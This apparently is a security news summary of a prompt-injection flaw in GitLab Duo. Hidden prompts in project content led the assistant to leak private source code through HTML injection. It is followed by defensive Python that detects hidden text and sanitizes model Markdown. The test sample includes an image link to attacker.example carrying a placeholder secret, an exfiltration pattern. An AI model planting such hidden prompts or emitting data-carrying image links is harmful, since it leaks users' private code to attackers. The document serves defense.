Critical Vulnerabilities in GitLab Duo Allow Source Code Exfiltration

2025-05-23
Researchers discovered critical vulnerabilities in GitLab Duo, an AI assistant integrated into GitLab. Attackers could embed hidden prompts within source code, comments, or other project content to manipulate Duo into leaking private source code and even zero-day vulnerabilities. The attack exploited Duo's context analysis and asynchronous Markdown rendering, leading to HTML injection and code theft. GitLab has since patched the vulnerabilities, but this incident highlights the importance of securing AI assistants. Any system incorporating LLMs must treat user input as untrusted and potentially malicious.
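Two defensive checks that follow from the summary above, written here as an added example rather than code from GitLab, from GitLab Duo, or from the researchers' write-up: the first scans project content for text a human reviewer would not see but an assistant would ingest (zero-width characters, invisible Unicode tag characters, HTML comments), and the second neutralises raw HTML and off-site images in Markdown the assistant produces before a renderer turns it into a request to an attacker-chosen host. It assumes nothing about Duo's internals; the function names, the allow-listed host and the sample inputs are constructed for illustration.

```python
import re
from urllib.parse import urlparse

# --- 1. Inspect content BEFORE it reaches the assistant -------------------
# Characters that render as nothing in a diff or editor but are still fed to
# the model as text.
ZERO_WIDTH = {"\u200b", "\u200c", "\u200d", "\u2060", "\ufeff"}
# Unicode "tag" characters (U+E0000..U+E007F) can spell out ASCII invisibly.
TAG_CHAR_RE = re.compile("[\U000E0000-\U000E007F]")
HTML_COMMENT_RE = re.compile(r"<!--(.*?)-->", re.DOTALL)


def find_hidden_content(text):
    """Return (kind, detail) findings for text a reviewer would not see
    but an LLM would ingest verbatim. Empty list means nothing suspicious."""
    findings = []
    zw_count = sum(1 for c in text if c in ZERO_WIDTH)
    if zw_count:
        findings.append(("zero_width", zw_count))
    tags = TAG_CHAR_RE.findall(text)
    if tags:
        # Reveal what the invisible run spells: U+E0041 -> 'A', and so on.
        decoded = "".join(chr(ord(c) - 0xE0000) for c in tags)
        findings.append(("unicode_tags", decoded))
    for m in HTML_COMMENT_RE.finditer(text):
        body = m.group(1).strip()
        if body:  # comments vanish once Markdown is rendered
            findings.append(("html_comment", body[:80]))
    return findings


# --- 2. Neutralise the assistant's output BEFORE it is rendered -----------
# Splitting on fenced blocks / inline code leaves code at the odd indexes of
# the resulting list; renderers already escape those, so they stay untouched.
CODE_RE = re.compile(r"(```.*?```|`[^`\n]*`)", re.DOTALL)
IMAGE_RE = re.compile(r"!\[([^\]]*)\]\(([^)\s]+)[^)]*\)")


def _url_allowed(url, allowed_hosts):
    parts = urlparse(url)
    if parts.scheme == "" and parts.netloc == "":
        return True  # relative path served by the application itself
    return parts.scheme in ("http", "https") and parts.hostname in allowed_hosts


def sanitize_llm_markdown(md, allowed_hosts=frozenset()):
    """Escape raw HTML and drop images that would make the viewer's browser
    fetch a URL the model chose (the zero-click exfiltration channel)."""
    def clean(segment):
        segment = segment.replace("<", "&lt;")  # no HTML tag can start without '<'

        def block_image(m):
            alt, url = m.group(1), m.group(2)
            if _url_allowed(url, allowed_hosts):
                return m.group(0)
            return f"[image blocked: {alt}]"

        return IMAGE_RE.sub(block_image, segment)

    pieces = CODE_RE.split(md)
    return "".join(p if i % 2 else clean(p) for i, p in enumerate(pieces))


if __name__ == "__main__":
    # Constructed sample: a source file with an HTML comment and zero-width
    # characters hidden inside an otherwise ordinary comment.
    sample_source = (
        "def f():\n    # ordinary comment\u200b\u200b\n    return 1\n"
        "<!-- ASSISTANT-DIRECTIVE-PLACEHOLDER -->\n"
    )
    print(find_hidden_content(sample_source))

    # Constructed sample: assistant output carrying an off-site image and a raw tag.
    sample_answer = (
        "Result:\n\n![chart](https://attacker.example/c.png?d=SECRET)\n\n"
        '<img src="https://attacker.example/x">\n\nuse `a<b` here\n'
    )
    print(sanitize_llm_markdown(sample_answer, {"gitlab.example"}))
```

The sanitizer escapes only `<`, so Markdown block quotes (`>`) keep working while no HTML tag can form; it belongs on the rendering side, after the model has answered, because any instruction the model was given to behave can itself be overridden by content it reads.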